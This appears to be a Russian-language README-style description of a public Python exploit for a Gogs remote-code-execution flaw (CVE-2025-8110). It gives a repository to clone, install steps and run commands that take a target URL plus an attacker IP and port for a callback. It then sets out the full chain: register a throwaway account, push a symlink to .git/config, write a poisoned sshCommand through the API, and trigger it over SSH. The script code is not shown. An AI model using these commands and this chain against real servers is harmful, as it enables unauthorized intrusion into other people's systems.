GOGS RCE cve-2025-8110 — это Python-скрипт, автоматизирующий всю цепочку атаки: создание репозитория с файлом-симлинком, указывающим на .git/config, и последующую реализацию RCE через отравленный sshCommand в файле конфигурации.
Gogs — это легковесный и самостоятельно размещаемый Git-сервис, аналогичный приватной версии GitHub, предназначенный для простого запуска на серверах с низкими ресурсами. Уязвимость CVE-2025-8110 — это критическая ошибка безопасности, которая позволяет атакующему обойти ограничения путей с помощью симлинков. Загрузив вредоносную ссылку, указывающую на .api/config, атакующий может использовать API Gogs для внедрения вредоносного конфигурационного файла с параметром sshCommand и добиться RCE на хост-сервере.
git clone https://github.com/kayl22/cve-2025-8110-GOGS-RCE
cd ./cve-2025-8110-GOGS-RCE
pip3 install -r ./requirements.txt
# Print help
python3 ./cve-2025-8110.py --help
# Execute the attack chain with register step
python3 ./cve-2025-8110.py --url http://<host> -lh <attacker-ip> -lp <attacker-port>
# Execute the attack chain skipping register | useful when register func returns err statement
python3 ./cve-2025-8110.py --url http://<host> -lh <attacker-ip> -lp <attacker-port> -U <username> -P <password>
This script follows an attack chain involving these steps:
1. Register & authenticate a throwaway account (Register skipped if creds are provided with -U and -P flags)
2. Obtain an API bearer token
3. Create an auto-initialised repository
4. Clone the repo locally and push a relative symlink malicious_link -> .git/config
5. PUT the malicious git config (with sshCommand) through the symlink via the PutContents API
6. Trigger the sshCommand by cloning the repo over SSH
This script was made using zAbuQasem (https://github.com/zAbuQasem) poc